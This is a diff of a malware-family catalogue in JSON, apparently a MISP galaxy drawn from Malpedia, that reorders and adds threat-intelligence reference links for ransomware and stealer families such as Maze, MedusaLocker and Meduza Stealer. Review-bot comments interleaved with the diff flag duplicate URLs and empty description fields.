"https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/", - "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us", - "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", - "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", - "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", - "https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/", - "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/", - "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker", - "https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update", - "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", - "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", - "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/", + "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/", - 
"https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/", - "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", + "https://twitter.com/certbund/status/1192756294307995655", + "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker", "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-village", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md", + "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/", "https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/", + 
"https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/", "https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U", + "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", + "https://securelist.com/targeted-ransomware-encrypting-data/99255/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/", + "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://securelist.com/maze-ransomware/99137/", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", 
+ "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", + "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf", + "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://www.secureworks.com/research/threat-profiles/gold-village", + "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/", + "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/", + 
"https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://oag.ca.gov/system/files/Letter%204.pdf", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/", + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html", + "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/", + "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html", + "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f", + "https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update", "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", "https://news.sophos.com/en-us/2020/09/22/mtr-casebook-blocking-a-15-million-maze-ransomware-attack/", - 
"https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", + "https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/", + "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", + "https://www.docdroid.net/dUpPY5s/maze.pdf", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://adversary.crowdstrike.com/adversary/twisted-spider/", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/", + "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf", + "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/", - "https://oag.ca.gov/system/files/Letter%204.pdf" + "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + 
"https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF", + "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/", + "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat" ], "synonyms": [ "ChaCha" @@ -33020,9 +34573,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock", - "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d", - "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html", + "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", + "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d", "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100" ], "synonyms": [ 
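Review bot: The rebuilt Maze refs contain near-duplicate URLs that a canonicalisation pass would have merged: `https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/` and the same URL without the trailing slash, and `http://www.secureworks.com/research/threat-profiles/gold-village` next to its `https://` form. Normalising scheme and trailing slash before deduplicating would drop these; the two `albertzsigovits/malware-notes` paths (`master/Maze.md` and `master/Ransomware/Maze.md`) look like the same note before and after a move, but that is an inference and worth a manual check rather than an automatic merge. The `cisoclub.ru` link and its `web.archive.org` copy should both be kept, since the archive is the resilient one. The same `part-1` / `part-1/` pair appears in the MedusaLocker hunk, which runs past the end of this chunk.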
@@ -33052,8 +34605,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi", "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/", - "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/", "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", + "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/", "https://www.symantec.com/connect/blogs/bios-threat-showing-again" ], "synonyms": [ @@ -33069,9 +34622,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" ], "synonyms": [ "GoldStamp" @@ -33099,10 +34652,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/", "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", - "https://news.drweb.com/show/?i=10302&lng=en" + "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/", + "https://news.drweb.com/show/?i=10302&lng=en", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf" ], "synonyms": [], "type": [] 
@@ -33115,34 +34668,34 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-3-analysing-medusalocker-ransomware/", - "https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html", + "https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html", "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/", - "http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html", - "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-2-analysing-medusalocker-ransomware/", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", - "https://blog.cyble.com/2023/03/15/unmasking-medusalocker-ransomware/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-3-analysing-medusalocker-ransomware/", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", "https://asec.ahnlab.com/en/48940/", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-181a", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/", + "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-2-analysing-medusalocker-ransomware/", + "https://twitter.com/siri_urz/status/1215194488714346496?s=20", + "http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", - 
"https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf", + "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", + "https://www.cybereason.com/blog/medusalocker-ransomware", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", + "https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://www.mandiant.com/resources/chasing-avaddon-ransomware", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-181a", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/", + "https://blog.cyble.com/2023/03/15/unmasking-medusalocker-ransomware/", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf", "https://blog.talosintelligence.com/2020/04/medusalocker.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://www.cybereason.com/blog/medusalocker-ransomware", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", - "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-1-analysing-medusalocker-ransomware/", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - 
"https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", - "https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/", - "https://twitter.com/siri_urz/status/1215194488714346496?s=20" + "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-1-analysing-medusalocker-ransomware/" ], "synonyms": [ "AKO Doxware", 
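Review bot: The reordered MedusaLocker refs still carry the same URL twice, differing only by a trailing slash: `"https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/"` and `"https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1"`, so consumers of the galaxy will display a duplicate reference. The importer that produces this array should normalise trailing slashes (and ideally scheme/host case) before de-duplicating, and one of the two lines can be dropped here. Separately, almost every line of this hunk is a pure reorder of unchanged refs; if the generator emitted refs in a stable order (as found in the upstream feed, or sorted), updates like this would diff cleanly and reviewers could see the genuinely new entries.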
@@ -33154,32 +34707,46 @@ "uuid": "77e7221f-d3db-4d13-bcde-e6d7a494f424", "value": "MedusaLocker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.meduza", + "https://russianpanda.com/2023/06/28/Meduza-Stealer-or-The-Return-of-The-Infamous-Aurora-Stealer/", + "https://www.zerofox.com/blog/the-underground-economist-volume-3-issue-12/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "20edd63e-d1a8-4aae-a0a6-50f5bb1cf65f", + "value": "Meduza Stealer" + }, { "description": "Megacortex is a ransomware used in targeted attacks against corporations.\r\nOnce the ransomware is run it tries to stop security related services and after that it starts its own encryption process adding a .aes128ctr or .megac0rtx extension to the encrypted files. It is used to be carried from downloaders and trojans, it has no own propagation capabilities.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex", - "https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", - "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/", "https://news.sophos.com/en-us/2019/05/10/megacortex-deconstructed-mysteries-mount-as-analysis-continues/", - "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/", - "https://threatpost.com/megacortex-ransomware-mass-distribution/146933/", + "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", + 
"https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/", + "https://blog.malwarebytes.com/detections/ransom-megacortex/", + "https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/", + "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/", + "https://www.bleepingcomputer.com/news/security/bitdefender-releases-free-megacortex-ransomware-decryptor/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", + "https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries", "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://www.trendmicro.com/vinfo/pl/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", - "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - 
"https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/", + "https://threatpost.com/megacortex-ransomware-mass-distribution/146933/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://blog.malwarebytes.com/detections/ransom-megacortex/", - "https://www.bleepingcomputer.com/news/security/bitdefender-releases-free-megacortex-ransomware-decryptor/", - "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/" + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf" ], "synonyms": [], "type": [] @@ -33192,8 +34759,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacreep", - "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/", - "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/" + "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/", + "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/" ], "synonyms": [], "type": [] @@ -33206,8 +34773,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://fumik0.com/2019/05/03/lets-nuke-megumin-trojan/" + "https://fumik0.com/2019/05/03/lets-nuke-megumin-trojan/", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145" ], "synonyms": [], "type": [] 
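Review bot: The new `Meduza Stealer` entry is added with `"description": ""`, which is an empty placeholder rather than an absent field and will surface as a blank description to anyone browsing or importing the cluster. Other entries touched in this same update (MEOW, Metamorfo) show the convention of a short attributed summary such as `"description": "According to <source>, …"`; the referenced write-ups (Malpedia `win.meduza`, the russianpanda post) appear to provide enough for a one-line equivalent here. If no summary is wanted, dropping the key is clearer than an empty string, provided the schema/consumers tolerate its absence.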
@@ -33220,15 +34787,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mekotio", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/", + "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/", + "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853", "https://twitter.com/hpsecurity/status/1509185858146082816", - "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf", + "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/", "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/", "https://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/", - "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/", "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam", - "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853", - "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/" + "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf" ], "synonyms": [], "type": [] 
@@ -33250,7 +34817,7 @@ "value": "Melcoz" }, { - "description": "Ransomware, based on leaked Conti source code.", + "description": "According to PCrisk, MEOW is ransomware based on other ransomware called CONTI. MEOW encrypts files and appends the \".MEOW\" extension to their filenames. It also drops the \"readme.txt\" file (a ransom note). An example of how MEOW ransomware modifies filenames: it renames \"1.jpg\" to \"1.jpg.MEOW\", \"2.png\" to \"2.png.MEOW\", and so forth.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.meow", @@ -33276,6 +34843,19 @@ "uuid": "5fa45856-2960-47c4-ad73-df0ff142ae12", "value": "MercurialGrabber" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.merdoor", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bf604927-77df-46e5-9bdb-ee9b631461a2", + "value": "Merdoor" + }, { "description": "Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.", "meta": { 
